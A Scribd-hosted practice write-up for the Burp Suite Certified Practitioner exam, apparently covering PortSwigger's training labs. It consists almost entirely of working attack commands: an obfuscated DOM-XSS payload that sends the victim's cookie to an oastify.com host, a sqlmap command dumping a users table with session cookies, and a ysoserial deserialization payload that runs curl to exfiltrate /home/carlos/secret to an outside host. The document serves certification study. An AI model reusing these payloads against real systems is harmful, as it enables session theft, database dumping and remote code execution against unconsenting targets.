Scribd
Upload
14 views2 pages

Practice Lab 2

Uploaded by

riodaniel66
Copyright
© © All Rights Reserved
We take content rights seriously. If you suspect this is your content, claim it here.
Available Formats
Download as TXT, PDF, TXT or read online on Scribd
14 views2 pages

Practice Lab 2

Uploaded by

riodaniel66
Copyright
© © All Rights Reserved
We take content rights seriously. If you suspect this is your content, claim it here.
Available Formats
Download as TXT, PDF, TXT or read online on Scribd
You are on page 1/ 2

_______________________________________

BURPSUITE CERTIFIED PRACTICIONER EXAM


Practice Lab 2

Leonardo Tamiano (Hexdump)


_______________________________________

Table of Contents
_________________

1. Step 1 - DOM-XSS to steal user cookie


2. Step 2 - Blind SQLi to get administrator password
3. Step 3 - Insecure Deserialization to leak carlos secret

1 Step 1 - DOM-XSS to steal user cookie


=======================================

Vuln was in the same place as Lab 1, but this time they did not allow
you to use parenthesis. So the following payload works without
parenthesis

,----
|
"};x=atob`ZmV0Y2goYGh0dHBzOi8vcXVvcmY0MTB3cXE4M2w2ZHJwMXI4YmZxcmh4OGwxOXEub2FzdGlme
S5jb20vP2M9JHtkb2N1bWVudC5jb29raWV9YCk`;eval.call `${x}`//
`----

2 Step 2 - Blind SQLi to get administrator password


===================================================

Exploited using `sqlmap'

,----
| sqlmap -u "https://0ae1005803ed0abb826347fb00520013.web-security-academy.net/
filtered_search?find=&organize=4&order=ASC&BlogArtist=Sophie+Mail" --
cookie="_lab=47%7cMC0CFE7nlltjNiEcP63FqFPLJ1f6%2fjJ7AhUAk8YfNVL6J
%2bJ2n93qNQoiTK6EF9xsCkI%2bRDfctaGysT48KuViBJ5XMuR8eI1YnVAafDK9Q1T79YeXddIyqT
%2b1Y6kjLDSygHAWsJw4xaBs4Ht%2fAN0mb%2bqdvYVpZ%2fi4%2bYX6I4GHarxCmWHy;
session=uZRcQuS98prWppuINr7MUISyME8PmdO7" -p 'order' -D public -T users --dump --
batch --level=5 --risk=3 --user-agent="Mozilla/5.0 (X11; Linux x86_64)
AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36"
`----

3 Step 3 - Insecure Deserialization to leak carlos secret


=========================================================

`Common Collections2'

,----
| java --add-opens=java.xml/com.sun.org.apache.xalan.internal.xsltc.trax=ALL-
UNNAMED
--add-opens=java.xml/com.sun.org.apache.xalan.internal.xsltc.runtime=ALL-UNNAMED
--add-opens=java.base/java.net=ALL-UNNAMED --add-opens=java.base/java.util=ALL-
UNNAMED -jar ysoserial-all.jar CommonsCollections2 'curl --data
@/home/carlos/secret https://ppiqa3wzrpl7yk1cmowq3aapmgs7g24r.oastify.com/?' | gzip
| base64 -w0 > out-CommonsCollections2
`----

You might also like